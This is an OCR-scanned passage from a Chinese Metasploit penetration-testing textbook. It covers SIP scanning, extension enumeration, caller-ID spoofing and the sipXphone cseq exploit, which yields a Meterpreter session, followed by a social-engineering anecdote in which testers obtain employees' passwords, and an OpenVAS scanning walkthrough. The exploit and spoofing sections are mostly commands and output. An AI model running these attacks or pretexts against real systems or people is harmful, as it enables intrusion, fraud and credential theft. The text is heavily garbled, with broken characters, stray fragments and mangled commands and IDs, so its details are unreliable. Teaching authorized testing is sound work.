果 进 行 分 析 。 这 里 的 目标 是 一 个 运行 了 Asterisk PBX VOIP 客户 端的 XP 系统 。 通 过载 人 一 个 辅助 模块 
来 扫描 网 络 中 的 SP 服务 ， 如 下 图 所 示 。 











msf > use auxiliary/scanner/sip/options 
msf auxiliary(options) > show options 
Module options (auxiliary/scanner/sip/options): 

Name Current Setting Required Description 

BATCHSIZE 256 yes The number of hosts to probe in each se 
it 

CHOST no The local client address 

CPORT 5060 no The local client port 

RHOSTS yes The target address range or CIDR identi 
fier 

RPORT 5060 yes The target port 

THREADS 1 yes The number of concurrent threads 

TO nobody no The destination username to probe at ea 
ch host 
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可 以 看 到 在 auxiliary/scanner/sip/options 辅助 模块 中 有 很 多 可 以 配置 的 选项 , 这 里 必须 





进行 配置 的 选项 只 有 RHOSTS。 当 对 大 型 网 络 进行 配置 的 时 候 ， 
uting, CIDR ) 格式 来 定义 IP 地 址 段 。 当 模块 运行 起 来 后 ,将 会 开始 扫描 指 
可 能 使 用 SIP 服务 的 设备 ， 运 行 这 个 模块 的 过 程 如 下 图 所 示 。 


inter domain ro 

















我 们 清楚 地 


sf auxiliary(options) > set RHOSTS 192.168.65.1/24 
STS => 192.168.65.1/24 
auxiliary(options) > run 


*] 192.168.65.128 sip:nobodyQ192.168.65.0 agent-'TJUQBGY' 

*] 192.168.65.128 sip:nobodyQ192.168.65.128 agent-'hAG' 

*] 192.168.65.129 404 agent-'Asterisk PBX' verbs-'INVITE, ACK, CANCEL, OPTIONS, 
BYE, REFER, SUBSCRIBE, NOTIFY' 

*] 192.168.65.128 sip:nobodyQ192.168.65.255 agent-'68T9c' 

*] 192.168.65.129 404 agent-'Asterisk PBX' verbs-'INVITE, ACK, CANCEL, OPTIONS, 
BYE, REFER, SUBSCRIBE, NOTIFY' 

*] Scanned 256 of 256 hosts (100% complete) 

*] Auxiliary module execution completed 

msf auxiliary(options) > Bi 




















息 。 这 些 SIP Jj 








因此 ， 可 以 使 用 这 个 模块 来 收集 网 络 上 的 SIP 服务 的 相关 信息 。 


5.3.3 扫描 VOIP 服务 
找 出 目标 所 支持 的 各 种 选项 的 请 求 信 息 后 ， 现 在 让 我 们 使 用 另 一 个 Metasploit 模块 


auxiliary/scanner/sip/enumerator 来 对 VOIP 服务 进行 扫描 和 用 户 列 举 。 这 个 模块 对 目标 范 目 

















可 以 使 用 无 类 别 域 际 路 由 选择 ( classless 


定 卫 范围 内 


看 到 , 这 个 模块 在 成 功 运行 之 后 会 返回 给 我 们 许多 使 用 了 SIP 服务 的 设备 的 IP 相关 信 
民 务 包括 agent ( 它 指示 PBX ) 和 verbs ( 它 定 义 PBX 支持 的 请 求 的 类 型 )。 





了 














内 的 VOIP 服务 进行 扫描 ， 并 试图 列举 出 所 有 用 户 。 下 面 来 看 一 下 这 个 模块 的 功能 。 

msf auxiliary(enumerator) > show options 

Module options (auxiliary/scanner/sip/enumerator): 
Name Current Setting Required Description 
BATCHSIZE 256 yes The number of hosts to probe in each set 
CHOST no The local client address 
CPORT 5060 no The local client port 
MAXEXT 9999 yes Ending extension 
METHOD REGISTER yes Enumeration method to use OPTIONS/REGISTER 
MINEXT 0 yes Starting extension 
PADLEN 4 yes Cero padding maximum length 
RHOSTS 192.168.65.128 yes The target address range or CIDR identifier 
RPORT 5060 yes The target port 
THREADS 1 yes The number of concurrent threads 

上 图 列举 了 这 个 模块 的 所 有 选项 。 为 了 能 使 用 该 模块 ， 必 须 对 其 中 的 一 些 选项 进行 设置 。 




















msf auxiliary(enumerator) > set MINEXT 3000 
MINEXT -» 3000 

msf auxiliary(enumerator) > set MAXEXT 3005 
MAXEXT -» 3005 

msf auxiliary(enumerator) > set PADLEN 4 
PADLEN => 4 
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如 图 所 示 ， 我 们 设置 了 MAXEXT. MINEXT, PADLEN 和 RHOSTS 选项 。 


在 上 图 中 使 用 的 列举 模块 中 ,我 们 分 别 将 MINEXT 和 MAXEXT 的 值 定义 为 3000 和 3005。MINEXT 
是 查找 分 机 号 码 的 起 始 地 址 ，MAXEXT 是 查找 分 机 号 码 的 结束 地 址 。 可 以 将 这 些 选 项 设置 成 一 个 相当 
大 的 范围 ,例如 将 MINEXT 设置 为 0, 将 MAXEXT 设置 为 9999，, 这 样 将 会 在 0~9999 地 址 范围 内 使 用 
VOIP 服务 的 分 机 号 码 中 查找 用 户 。 


接 下 来 为 RHOSTS 变量 赋 一 个 CIDR 格式 的 值 来 运行 这 个 模块 ， 从 而 扫描 目标 范 上 上 
如 下 图 所 示 。 
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zi 
































内 的 计算 机 ， 


zu 











msf  auxiliary(enumerator) > set RHOSTS 192.168.65.0/24 
RHOSTS -» 192.168.65.0/24 


将 RHOSTS 的 值 设 定 为 192.168.65.0/24, 该 模块 将 会 扫描 整个 日 标 子 网 。 现在 运行 这 个 模块 ， 
可 以 看 到 如 下 显示 。 

















hsf auxiliary(enumerator) > run 





] Found user: 3000 <sip:3000@192.168.65.129> [Open] 
] Found user: 3001 «sip:30010192.168.65.129» [Open] 
] Found user: 3002 «sip:30020192.168.65.129» [Open] 
] Found user: 3000 «sip:30008192.168.65.255» [Open] 
] Found user: 3001 «sip:30010192.168.65.255» [Open] 
] Found user: 3002 «sip:30020192.168.65.255» [Open] 
] Scanned 256 of 256 hosts (100% complete) 

] Auxiliary module execution completed 


扫描 结果 显示 了 大 量 使 用 了 SIP 服务 的 用 户 。 另 外 ， 由 于 之 前 设置 了 MAXEXT 和 MINEXT 的 值 ， 
该 模块 只 扫描 了 分 机 号 码 为 3000~3005 的 用 户 ， 一 个 分 机 号 码 可 以 被 看 作 是 一 个 特定 网 络 中 用 户 的 
地 址 。 















































5.3.4 欺骗 性 的 VOIP 电话 


在 获得 了 足够 多 的 关于 使 用 SIP 服务 的 用 户 信息 之 后 , 使 用 来 伪造 一 次 其 骗 性 的 通话 。 
这 里 有 一 个 用 户 在 Windows XP 上 运行 着 SipXphone 2.0.6.27， 可 以 使 用 auxiliary/voip/ 
sip invite spoof 模块 来 向 他 发 送 一 个 伪造 的 会 话 请 求 ， Y 


psf > use auxiliary/voip/sip invite spoof 
f auxiliary(sip invite spoof) » show options 






































Module options (auxiliary/voip/sip invite spoof): 
Name Current Setting Required Description 
DOMAIN no Use a specific SIP domain 
EXTENSION 4444 no The specific extension or name to target 
MSG The Metasploit has you yes The spoofed caller id to send 
RHOSTS 192.168.65.129 yes The target address range or CIDR identifier 
RPORT 5060 yes The target port 
SRCADDR 192.168.1.1 yes The sip address the spoofed call is coming from 
THREADS 1 yes The number of concurrent threads 





sf auxiliary(sip invite spoof) > back 

sf > use auxiliary/voip/sip invite spoof 

sf auxiliary(sip invite spoof) > set RHOSTS 192.168.65.129 
lOSTS => 192.168.65.129 

sf auxiliary(sip invite spoof) > set EXTENSION 4444 
XTENSION => 4444 
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我 们 将 参数 RHosms 的 值 设 定 为 目标 的 卫 地 址 ， 将 EXTENSION 设 定 为 4444。SRCADDR 的 值 保 
持 为 192.168.1.1， 这 个 值 就 是 我 们 拨打 电话 时 伪造 的 源 地 址 。 
好 了 ， 现 在 运行 这 个 模块 。 











msf auxiliary(sip invite spoof) > run 
[*] Sending Fake SIP Invite to: 44440192.168.65.129 


[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


现在 查看 受害 者 的 客户 端 。 








sipXphone 


Messages 


The Metasploit has you 
sip:192.168.1.1 











可 以 清楚 地 看 到 ， 电 话 软件 显示 有 来 电 了 。 显 示 的 来 电 卫 为 192.168.1.1， 同 时 也 显示 了 来 自 
Metasploit 的 预定 义 消 息 。 











5.3.5 对 VOIP 进行 渗透 


如 果 想 获得 系统 的 完全 控制 权限 ， 也 可 以 尝试 对 电话 软件 进行 渗透 。 在 上 一 个 场景 中 ,我们 已 经 
获得 了 目标 的 IP 地 址 ， 接 下 来 让 我 们 使 用 Metasploit 对 其 进行 渗透 。Kali 操作 系统 中 包含 了 专门 设计 
测试 VOIP 服务 的 工具 。 下 面 提供 了 一 个 可 以 用 来 渗透 VOIP 服务 的 工具 列表 。 








L1 Smap 
口 Sipscan 
口 Sipsak 
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0 Voipong 
口 Svmap 








现在 返回 到 渗透 的 内 容 ， 在 Metasploit 中 同样 包含 了 很 多 用 来 渗透 VOIP 软件 的 功能 模块 ,我们 
来 看 一 个 这 样 的 例子 。 








这 里 要 渗透 的 目标 程序 是 SipXphone Version 2.0.6.27， 该 应 用 的 图 形 化 界面 如 下 图 所 示 。 


sipXphone 


Messages 


What does that button do? 
Hold it down to see a Hint! 





1. 关于 漏洞 


这 个 漏洞 在 该 应 用 处 理 cseq 值 的 时 候 产 生 。 发 送 一 个 超出 指定 长 度 的 字符 串 将 会 引起 该 和 
溃 ， 同 时 还 会 导致 攻 击 者 运行 恶意 代码 并 获得 系统 的 管理 权限 。 


2. 对 应 用 的 渗透 攻击 


hU 
m 





现在 开始 使 用 Metasploit 对 SipXphone Version 2.0.6.27 进行 渗透 ,要 用 到 的 渗透 模块 为 exploit/ 
windows/sip/sipxphone_cseq。 在 Metasploit 中 启动 这 个 模块 ， 并 设置 必要 的 选项 。 








msf > use exploit/windows/sip/sipxphone cseq 

sf exploit(sipxphone cseq) > set RHOST 192.168.65.129 

HOST -» 192.168.65.129 

msf exploit(sipxphone cseq) > set payload windows/meterpreter/bind tcp 
payload => windows/meterpreter/bind tcp 

msf exploit(sipxphone cseq) > set LHOST 192.168.65.128 

LHOST => 192.168.65.128 

msf exploit(sipxphone cseq) > exploit 














这 里 必须 设置 RHOST, LHOST 和 payload 的 值 。 当 一 切 设置 完毕 之 后 ， 开 始 对 目标 程序 进行 活 








16 


0 


AF 
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透 ， 这 个 过 程 如 下 图 所 示 。 
















eterpreter > 


sf exploit(sipxphone cseq) > exploit 


[*] Started bind handler 

[*] Trying target SIPfoundry sipXphone 2.6.0.27 Universal... 

[*] Sending stage (752128 bytes) to 192.168.65.129 

[*] Meterpreter session 2 opened (192.168.65.128:42522 -» 192.168.65.129:4444) at 2013-09-05 15:27:57 40530 




















成 功 了 ! 我 们 不 费 吹 灰 之 力 就 获得 了 目标 的 Meterpreter 控制 权 ， 使 用 Metasploit 利用 软件 的 漏洞 











来 渗透 VOIP 是 一 项 极为 容易 的 任务 。 如 果 要 对 VOIP 设备 或 其 他 设备 相关 的 漏洞 进行 高 效 测试 ， 可 


以 使 


0 : 


com/feature/Securing- VoIPKeeping-Your-VoIP-Networks-Safe 和 https://www.sans.org/ 


5.4 
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口 尝试 使 


从 





以 下 网 址 可 以 找到 对 VOIP 进行 测试 的 优质 资源 : http://www.viproy.com。 


以 参考 更 多 关于 确保 VOIP 网 络 安 全 性 的 优秀 指南 : https://searchsecurity.techtarget. 


reading-room/whitepapers/voip/security-issues-countermeasurevoip-1701。 


小 结 与 练习 


在 本 章 中 ,我 们 见识 到 了 多 个 渗透 测试 。 在 这 些 场景 中 ,我们 分 别 完成 了 对 各 种 服务 的 渗透 ， 例 
如 数据 库 、VOIP 和 SCADA。 本 章 学 习 了 SCADA 以 及 它 的 基本 原理 ， 还 学 习 了 如 何 获得 一 个 数据 库 
服务 的 各 种 信息 ， 以 及 如 何 取得 这 个 数据 库 的 全 部 控制 权限 。 此 外 ， 还 学 习 了 如 何 通过 扫描 网 络 上 的 
VOIP 客户 端 来 实现 VOIP 欺骗 ， 以 此 完成 对 VOIP 服务 的 测试 。 





























在 进入 下 一 章 之 前 ， 你 应 该 完成 以 下 练习 。 


O 安装 MySQL, Oracle 和 PostgreSQL ， 并 使 用 Metasploit 进行 测试 。 查 找 针 对 这 些 数据 库 的 渗 
透 模块 ， 如 果 Metasploit 没有 这 种 模块 的 话 ， 就 自行 开发 替代 的 模块 。 





























用 Metasploit 实现 SQL 注入 攻击 的 自动 化 。 
口 如 果 你 对 SCADA 和 ICS 感 兴趣 的 话 ， 可 以 访问 Samurai STFU 网 站 。 
O 对 一 个 VOIP 软件 (不 要 使 用 书 中 讲解 的 这 个 ) 进行 渗透 测试 。 




















下 一 章 将 介绍 如 何 使 用 Metasploit 和 其 他 的 流行 扫描 工具 来 完成 一 个 完整 的 渗透 测试 。 还 将 涵盖 
如 何 系统 地 实现 一 次 对 指定 目标 的 渗透 测试 , 介绍 如 何 创 建 一 份 渗透 测试 的 报告 ， 以 及 该 报告 中 应 该 
包含 哪些 内 容 和 应 该 将 哪些 内 容 排除 在 外 。 
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本 书 前 几 章 已 经 涵盖 了 大 量 的 渗透 相关 知识 ,现在 是 时 候 来 将 这 些 知识 应 用 到 实践 中 了 。 我们 要 
使 用 Metasploit 中 各 种 业内 领先 的 测试 工具 来 轻松 地 对 目标 网 络 、 网 站 或 者 其 他 服务 进行 渗透 测试 和 
漏洞 评估 。 

本 章 将 着 眼 于 以 下 几 个 要 点 。 


口 让 Metasploit 与 其 他 各 种 渗透 测试 工具 协同 工作 。 
口 将 各 种 工具 和 各 种 格式 的 报告 导入 到 Metasploit 框架 中 。 
口 创建 渗透 测试 报告 。 
本 章 的 重点 是 使 用 各 种 行业 内 流行 的 工具 与 Metasploit 一 起 进行 渗透 测试 。 不 过 Web 安全 测试 的 
测试 阶段 可 能 与 其 他 类 型 的 安全 测试 有 所 不 同 ， 但 原则 仍然 是 相同 的 。 









































6.1 使 用 Metasploit 集成 的 服务 完成 一 次 渗透 测试 


我 们 可 以 使 用 三 种 不 同 的 方法 来 完成 一 次 渗透 测试 ， 分 别 是 白 盒 测试 、 黑 盒 测 试 和 灰 盒 测试 。 白 
盒 测 试 指 的 是 渗透 测试 工程 师 已 经 掌握 了 系统 的 全 部 信息 ， 而 且 客 户 将 会 提供 所 有 账户 信息 、 源 代码 
和 其 他 与 环境 有 关 的 必要 信息 。 黑 盒 测 试 指 的 是 渗透 测试 工程 师 此 前 对 目标 的 信息 掌握 量 几乎 为 零 。 
灰 盒 测试 介 于 两 者 之 间 ,， 指 的 是 渗透 测试 工程 师 仅 掌握 了 少量 或 部 分 环境 信息 。 我 们 将 在 本 章 的 下 一 
节 展 示 一 次 灰 盒 测试 , 因为 这 种 测试 方法 最 大 程度 上 结合 了 另外 两 种 方法 的 优点 。 灰 盒 测 试 可 能 包含 ， 
也 可 能 不 包含 操作 系统 (operating system, OS ) 的 细节 、 部 署 的 Web 应 用 程序 、 运 行 的 服务 器 版 本 以 
及 完成 渗透 测试 所 需 的 所 有 其 他 技术 细节 。 灰 盒 测 试 所 需 的 部 分 信息 要 求 测试 人 员 使 用 扫描 获取 ， 
此 它 的 耗 时 将 比 黑 盒 测试 少 ， 但 是 比 白 盒 测试 多 。 


假设 我 们 知道 目标 服务 器 上 运行 着 Windows 操作 系统 ,但 不 知道 其 确切 版 本 。 在 这 种 情况 下 , 我 
们 就 可 以 将 Linux 和 Unix 系统 的 踩点 技术 去 掉 ， 将 全 部 精力 都 放 在 Windows 版 本 的 检查 上 。 这 样 可 
将 处 理 范围 局 限 在 单一 系统 内 ， 而 无 须 考虑 所 有 类 型 的 系统 ， 从 而 节省 了 大 量 时间 。 


以 下 是 使 用 灰 盒 测试 技术 进行 渗透 测试 的 各 个 阶段 。 











































































































162 第 6 章 ”虚拟 化 测试 的 原因 及 阶段 












































REST 
























































针对 目标 系统 /易于 遭受 
漏洞 攻击 的 系统 做 准 
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获取 访问 权限 
























































上 图 清楚 地 说 明了 灰 盒 测试 包括 的 各 个 阶段 。 另 外 ， 图 中 使 用 虚线 框 的 阶段 并 不 是 必需 的 。 而 使 
































4 











用 双 线 框 表示 的 阶段 是 关键 阶段 ， 使 用 单线 框 表示 的 阶段 是 在 进行 测试 时 要 遵循 的 标准 阶段 。 





始 渗透 测试 并 对 灰 盒 测试 的 各 个 方面 进行 分 析 。 





6.1.1 与 员工 和 最 终 用 户 进行 交流 








现在 开 


进入 客户 的 工作 场所 后 要 做 的 第 一 件 事情 就 是 与 员工 以 及 最 终 用 户 进行 交流 。 这 个 阶段 进行 的 主 





要 是 非 技术 型 黑客 行为 , 也 就 是 社会 工程 学 。 这 样 做 的 目的 是 以 最 终 上 









































j 户 的 角度 收集 目标 系统 的 信息 。 


这 个 阶段 同样 也 检测 了 目标 组 织 的 最 终 用 户 是 否 会 因 泄露 内 部 的 信息 从 而 导致 系统 安全 被 破坏 。 下 面 


的 例子 应 该 可 以 让 你 对 此 有 一 个 更 深 的 了 解 


o 


去 年 ,我 们 的 团队 开展 了 一 次 白 盒 测试 。 我 们 来 到 客户 的 工作 场所 进行 进一步 的 内 部 测试 。 到 那 
里 之 后 ,我 们 开始 与 最 终 用 户 交 流 ， 询 问 他 们 在 使 用 新 安装 的 系统 时 是 否 遇 到 了 什么 问题 。 出 人 意料 
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f 
内 不 允许 连接 超过 10 Ko 
























































4 是 ， 他 们 谁 都 不 允许 我 们 接触 他 们 的 系统 。 但 他 们 很 快 解释 说 这 是 因为 有 一 个 登录 问题 ， 一 段 时 间 


虽然 知道 这 是 客户 公司 的 安全 策略 , 但 是 我 们 对 于 不 能 使 用 任何 客户 端 还 是 有 些 惊讶 。 不 过 后 来 ， 


我 们 团队 的 一 个 成 员 发 现 了 一 位 55~60 岁 的 老 员工 在 使 用 互联 网 时 遇 到 了 问题 。 我 们 过 去 询问 他 是 否 
需要 些 帮 助 ， 他 的 回答 是 肯定 的 。 我 们 告诉 他 可 以 用 我 们 带 来 的 笔记 本 连接 到 局 域 网 中 工作 。 
线 插 到 了 我 们 的 笔记 本 电脑 上 ， 然 后 开始 工作 。 我 们 中 一 个 站 在 他 身后 的 同事 使 用 手中 的 摄像 笔记 录 
了 这 位 老 员 工 的 所 有 操作 ， 例 如 他 登录 系统 的 账号 。 











我 们 又 发 现 了 一 位 系统 出 现 问题 的 女士 


















































他 把 网 











， 她 说 好 经常 在 登录 的 时 候 遇 到 问题 。 我 们 随即 告 


TYRA, 


我 们 将 尽快 解决 ,但 是 我 们 需要 她 的 账户 信息 以 便 从 后 台 进行 处 理 。 男 外 我 们 还 对 她 说 , 需要 她 将 用 
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户 名 、 密 码 以 及 登录 的 IP 地 址 告诉 我 们 。 她 很 快 同意 了 , 并 将 这 一 切 都 告诉 了 我 们 。 通 过 这 个 例子 可 
以 得 出 这 样 的 结论 : 无 论 这 些 网 络 环境 设置 得 多 么 安全 ， 当 员工 遇 到 问题 时 ,他 们 都 可 能 会 轻易 地 泄 
露 自 己 的 登录 信息 。 我 们 后 来 将 这 些 内 容 作 为 报告 的 一 部 分 汇报 给 了 客户 。 

从 最 终 用 户 处 可 以 获得 的 其 他 类 型 的 有 用 信息 包括 下 面 这 些 。 


口 他 们 工作 时 所 使 用 的 技术 。 
口 服务 器 平台 和 操作 系统 的 详细 信息 。 
口 隐藏 的 登录 IP 地 址 或 者 管理 区 域 地 址 。 
口 系统 的 配置 和 操作 系统 的 详细 信息 。 
O Web 服务 器 的 后 台 技术 。 
这 些 信 息 在 对 可 测试 的 系统 进行 先 验 性 技术 测试 时 是 必需 的 ， 将 有 助 于 确定 测试 的 关键 区 域 。 
不 过 ， 这 个 阶段 在 进行 灰 盒 测试 时 并 不 是 必需 的 。 比 如 说 有 时 你 的 客户 只 是 需要 你 完成 对 他 们 
网 站 的 测试 ， 或 者 你 的 客户 公司 在 一 个 很 远 的 地 方 ， 甚 至 跟 你 不 在 同一 个 国家 。 在 这 些 情况 下 ， 我 
们 将 略 过 这 个 阶段 ， 并 向 公司 的 管理 员 或 者 其 他 工作 人 员 询 问 他 们 目前 正在 使 用 的 各 种 技术 。 


6.1.2 ”收集 信息 


在 与 最 终 用 户 交 流 完 之 后 ， 我 们 需要 研究 网 络 配置 并 从 目标 网 络 获取 更 多 信息 。 同 时 ， 从 最 终 用 
户 处 收集 到 的 信息 可 能 是 不 全 面 甚至 是 错误 的 。 渗 透 测试 工程 师 的 职责 之 一 就 是 将 每 一 个 细节 再 确认 
一 遍 ， 因 为 误 报 和 伪造 的 信息 可 能 会 使 渗透 测试 出 现 问题 。 

信息 收集 包括 获取 目标 网 络 的 深入 细节 、 所 使 用 的 技术 、 正 在 运行 的 服务 版 本 ， 等 等 。 

这 些 信息 可 以 从 最 终 用 户 、 管 理 员 、 网 络 工程 师 处 收集 。 在 进行 远程 测试 或 者 信息 收集 不 完整 的 
时 候 , 可 以 使 用 各 种 漏洞 扫描 工具 ( 例如 Nessus、GFI 局 域 网 卫士 、OpenVAS 等 ) 来 获取 缺少 的 信息 ， 
例如 操作 系统 、 服 务 、TCP 或 者 UDP 端口 。 

在 下 一 节 中 ， 我 们 会 使 用 行业 内 最 优秀 的 工具 ( 例如 Nessus 和 OpenVAS ) 来 收集 信息 。 不 过 在 
开始 这 个 任务 之 前 ， 可 以 先 使 用 客户 端 访问 页 面 、 进 行 前 期 交互 或 用 问卷 调查 等 方法 获取 一 部 分 待 测 
试 环境 的 信息 。 

测试 环境 示例 

根据 通过 问卷 调查 、 前 期 交互 和 用 客户 端 访 问 页 面 等 方法 收集 到 的 信息 ,我们 得 出 以 下 的 测试 环 
境 示 例 。 
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我 们 已 经 获得 了 对 目标 网 络 的 VPN 访问 权限 ， 目 标 是 对 一 个 网 络 进行 渗透 测试 。 我 们 已 经 获悉 
该 企业 网 络 使 用 了 基于 Windows 的 操作 系统 。 假 设 这 里 已 经 如 同 第 1 章 介绍 的 那样 使 用 NMAP 完成 
了 对 目标 的 扫描 ， 并 在 192.168.0.196 上 发 现 了 一 个 用 户 系 统 。 接 下 来 让 我 们 使 用 Metasploit 和 其 他 行 
业 顶 尖 工 具 来 完成 一 次 全 面 的 渗透 测试 。 第 一 个 登场 的 工具 是 OpenVAS。 这 是 一 款 漏洞 扫描 软件 , 是 
世界 上 最 先进 的 漏洞 管理 工具 之 一 。OpenVAS 最 大 的 优势 在 于 它 是 完全 免费 的 , 这 一 点 使 它 成 为 小 型 
公司 和 个 人 的 最 佳 选择 。 虽 然 OpenVAS 有 时 也 会 出 现 一 些 问 题 ， 而 且 可 能 需要 你 花费 很 多 精力 去 手 
动 修复 这 些 错 误 ， 但 是 作为 行业 瑰宝 之 一 ，OpenVAS 一 直 是 我 最 为 欣赏 的 漏洞 扫描 程序 。 
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qp 如 果 需 要 在 Kali Linux 中 安装 OpenVAS, 可 以 参考 以 下 网 址 提供 的 资料 : https:/www. 


kali.org/penetration-testing/openvas-vulnerability-scanning/。 


6.1.3 ”使 用 Metasploit 中 的 OpenVAS 插件 进行 漏洞 扫描 


为 了 将 OpenVAS 整合 到 Metasploit 中 ， 首 先 需 要 在 Metasploit 中 加 载 OpenVAS 插件 ， 过 程 如 下 。 














msf > load 


Load alias load msgrpc load sounds 

Load auto add route load nessus load sqlmap 

load db credcollect load nexpose load thread 

load db tracker load openvas load token adduser 
load event tester load pcap log load token hunter 
load ffautoregen load request load wiki 

load ips filter load sample load wmap 

load lab load session tagger 

load msfd load socket logger 


msf > load openvas 
[*] Welcome to OpenVAS integration by kost and averagesecurityguy. 


[+] OpenVAS integration requires a database connection. Once the 
[*] database is ready, connect to the OpenVAS server using openvas connect. 
[*] For additional commands use openvas help. 








[*] Successfully loaded plugin: OpenVAS 
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可 以 看 到 ， 在 Metasploit 中 还 包含 了 很 多 流行 的 工具 模块 ， 例 如 SQLMAP 、Nexpose 和 Nessus, 
为 了 将 OpenVAS 插件 加 载 到 Metasploit 中 ， 需 要 在 Metasploit 的 控制 台中 输入 命令 load openvas。 
上 图 显示 了 一 个 在 Metasploit 中 成 功 加 载 OpenVAS 插件 的 过 程 。 


为 了 能 在 Metasploit 中 使 用 OpenVAS 的 功能 ， 需 要 将 Metasploit 中 的 OpenVAS 插件 与 OpenVAS 
软件 本 身 连 接 起 来 。 这 一 点 可 以 通过 在 命令 openvas_connect 后 面 添加 用 户 凭 证、 服务器 地 址 、 端 
口号 和 SSL 状态 实现 ， 整 个 过 程 如 下 图 所 示 。 















































msf > openvas connect admin admin localhost 9390 ok 
[*] Connecting to OpenVAS instance at localhost:9390 wi| 
th username admin... 
OpenVAS connection successful 
msf » 





























在 正式 开始 之 前 , 我 们 先 来 了 解 一 下 工作 区 的 概念 。 使 用 工作 区 是 一 个 管理 渗透 测试 的 绝 佳 选择 ， 
特别 是 当 你 在 一 家 专门 从 事 渗 透 测试 和 漏洞 评估 的 公司 工作 的 时 候 。 我 们 可 以 为 不 同 的 项 目 创建 不 同 
的 工作 区 ， 从 而 轻松 管理 这 些 项 目 。 使 用 工作 区 可 以 确保 不 会 将 本 次 测试 和 其 他 项 目的 结果 弄 混 。 因 
此 ， 我 强烈 建议 你 在 进行 渗透 测试 的 时 候 使 用 工作 区 。 


新 工作 区 的 创建 以 及 工作 区 之 间 的 切换 十 分 简单 ， 下 图 给 出 了 工作 区 的 操作 实例 。 


Imsf > workspace -a AD Test 
Added workspace: AD Test 

> workspace AD Test 

Workspace: AD Test 

d. 
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mh 一 
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msT 


在 上 图 中 ,我们 添加 了 一 个 名 为 AD Test 的 新 工作 区 ， 然 后 仅 通过 输入 workspace 命令 和 
AD_Test (工作 区 的 名 字 ) 就 切换 到 了 这 个 工作 区 
要 启动 漏洞 扫描 ， 第 一 件 要 做 的 事 就 是 创建 目标 。 可 以 使 用 命令 openvas_target_create 来 
创建 任意 数量 的 目标 ， 如 下 图 所 示 。 
sf > openvas target create 196 System 192.168.0.196 196 System in AD 


[*] 5e34d267-af41-4fe2-b729-2890ebf9ce97 
OpenVAS list of targets 


























x 























ID Name Hosts Max Hosts In Use Comment 





e34d267-af41-4fe2-b729-2890ebf9ce97 196 System 192.168.0.196 1 9 196 System in AD 








我 们 已 经 创建 了 了 下地 址 为 192.168.0.196 的 目标 , 它 的 名 字 为 196_System, MIEN 196 System. 
in AD (为 了 对 目标 进行 说 明 )。 最 好 记 住 这 个 目标 的 ID。 

接 下 来 需要 为 被 测试 的 目标 定义 一 个 策略 。 可 以 使 用 openvas_config_list 命令 列 出 示例 策 
略 ， 如 下 所 示 。 
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msf > openvas config list 
[*] OpenVAS list of configs 
ID Name 


085569ce-73ed-11df-83c3-002264764cea empty 
2d3f051c-55ba-11e3-bf43-406186ea4fc5 Host Discovery 
698f£691e-7489-11df-9d8c-002264764cea Full and fast ultimate 
708£25c4-7489-11df-8094-002264764cea Full and very deep 
74db13d6-7489-11df-915b9-002264764cea Full and very deep ultimate 
8715c877-47a0-438d-98a3-27c7a6ab2196 Discovery 
bbca7412-a950-11e3-9109-406186ea4fc5 System Discovery 
daba56c8-73ec-11df-a475-002264764cea Full and fast 


出 于 学 习 的 目的 ， 我 们 选择 使 用 Full and fast ultimate 策略 。 留 心 一 下 策略 ID, XX HOM ID Je 
698f£691e-7489-11df-9d8c-002264764cea. 




















现在 已 经 知道 了 目标 ID 和 策略 ID ， 可 以 更 进一步 ， 使 用 如 下 所 示 的 命令 openvas task create 
来 创建 一 个 漏洞 扫描 任务 。 


msf > openvas task create 

[*] Usage: openvas task create «name» «comment» «config id» «target id» 
msf > openvas task create 196 Scan NA 698f691e-7489-11df-9d8c-002264764cea 
5e34d267-af41-4fe2-b729-2890ebf9ce97 

[*] 694e5760-bec4-4£80-984£-7c50105a1e00 


[*] OpenVAS list of tasks 
ID Name Comment Status Progress 


694e5760-bec4-4£80-984f-7c50105a1e00 196 Scan NA New s 


我 们 已 经 使 用 openvas. task create 命令 和 任务 名 字 、 注 释 、 控 制 ID 和 1 (目标 ID ) 创建 了 
一 个 新 的 任务 。 成 功 创建 任务 之 后 ， 就 可 以 按 如 下 所 示 开 始 扫 描 了 。 


msf > openvas task start 694e5760-bec4-4f80-984f-7c50105ale00 

[*] «X»«authenticate response status-'200' 

Status text-'OK'»«role»Admin«/role»«timezone»UTC«/timezone»«severity»nist«/ 
Severity»«/authenticate response»«start task response status-'202' 

Status text-'OK, request submitted'»«report id»c7886b9c-8958-4168-9781- 
cea09699bae6«/report id»«/start task response»«/X» 


从 上 面 的 结果 中 可 以 看 到 ,我 们 已 经 使 用 openvas. task start 命令 和 任务 ID 完成 了 扫描 的 初 
始 化 。 现 在 使 用 openvas task list 命令 来 查看 一 个 任务 的 进度 ， 如 下 图 所 示 。 







































































msf > openvas task list 
OpenVAS list of tasks 


ID Name Comment Status Progress 


694e5760-bec4-4f80-984f-7c50105ale00 196 Scan NA Running 98 





























保持 对 任务 进度 的 观察 ， 直 至 任务 结束 。 然 后 使 用 openvas report list 命令 列 出 扫描 报告 ， 
过 程 如 下 图 所 示 。 
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OpenVAS list of reports 


ID Task Name Start Time Stop Time 


cb5e7160-742c-4f04-8d9c-ed9626el4f6b 196 Scan —2018-03-30T10:41:54Z 














我 们 可 以 下 载 这 份 报告 ， 也 可 以 使 用 openvas_report_download 命令 以 及 报告 ID 、 格 式 ID, 
位 置 和 名 字 将 这 份 报告 直接 导 和 数据库， 如 下 图 所 示 。 


msf > openvas report download cb5e7160-742c-4f04-8d9c-ed9626el4f6b a994b278-1f62 
-llel-96ac-406186ea4fc5 /root/196.xml 196 


我 们 可 以 通过 openvas. report. import 命令 将 其 导入 到 Metasploit 中 ， 如 下 图 所 示 。 
























































msf > db import /root/196.xml/196 

[*] Importing 'OpenVAS XML' data 

[*] Successfully imported /root/196.xml/196 
msf » 


也 可 以 使 用 openvas, format. 1ist 命令 来 查看 所 有 的 格式 ID ， 过 程 如 下 图 所 示 。 























OpenVAS list of report formats 
ID Name Extension Summary 
5057e5cc-b825-11e4-9d0e-28d24461215b Anonymous XML xml Anonymous version of the raw XML report 
50c9950a-f326-11e4-800c-28d24461215b Verinice ITG vna Greenbone Verinice ITG Report, v1.0.1. 
5ceff8ba-1f62-11el-ab9f-406186ea4fc5 CPE CSV Common Product Enumeration CSV table. 
6c248850-1f62-11e1-b082-406186ea4fc5 HTML html Single page HTML report. 
77bd6c4a-1f62-11el-abf0-406186ea4fc5 ITG csv German "IT-Grundschutz-Kataloge" report. 
9087b18c-626c-11e3-8892-406186ea4fc5 CSV Hosts csv CSV host summary. 
